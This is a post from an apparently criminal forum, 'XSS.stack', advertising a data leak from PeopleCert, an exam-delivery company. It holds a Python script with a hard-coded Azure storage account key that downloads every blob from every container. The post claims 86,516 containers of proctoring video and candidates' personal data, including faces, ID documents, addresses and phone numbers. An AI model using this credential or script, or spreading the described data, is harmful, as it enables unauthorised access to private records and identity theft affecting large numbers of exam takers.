• XSS.stack #1 – первый литературный журнал от юзеров форума

pii leak

В этой теме можно использовать автоматический гарант!

Статус
Закрыто для дальнейших ответов.

XYZ_

floppy-диск
Пользователь
Регистрация
28.06.2023
Сообщения
4
Реакции
6
PeopleCert is the global leader in the delivery of examination and accreditation services, delivering millions of exams in over 200 countries. Partnering with multi-national organizations and government bodies, PeopleCert develops and delivers market-leading exams worldwide, enabling professionals to reach their full potential and realize their life ambitions through learning.

PeopleCert recently acquired Axelos, a joint venture company created in 2013 by the Cabinet Office on behalf of Her Majesty’s Government (HMG) in the United Kingdom and Capita plc (CPI.L). Axelos is responsible for developing, enhancing, and promoting several best practice methodologies used globally by professionals working primarily in project, programme and portfolio management, IT service management and cyber resilience, , including the global programs of ITIL® and PRINCE2®.

Python:
from azure.storage.blob import BlobServiceClient
service_client = BlobServiceClient(account_url="https://m2mstorage.blob.core.windows.net", credential={"account_name": "m2mstorage", "account_key":"hD9CHpJrkWG7DQAIcGezRbsb01uD1bXjeNd6cS8hs+3NfZFRiPOg2gaC/cyCBbdjbee+Ixt9bDQxONOowQE8Xg=="})

for a in service_client.list_containers():
    container_client = service.get_container_client(a.name)
    for b in container_client.list_blobs():
        blob_client = container_client.get_blob_client(b.name)
        with open(b.name, "wb") as f:
            blob_client.download_blob().readinto(f)

86516 containers with mp4 datas

* tester face and voice
* 360 degree view of tester room
* name
* dob
* passport/DL/other front and back
* email
* address
* phone num
 
Статус
Закрыто для дальнейших ответов.
Верх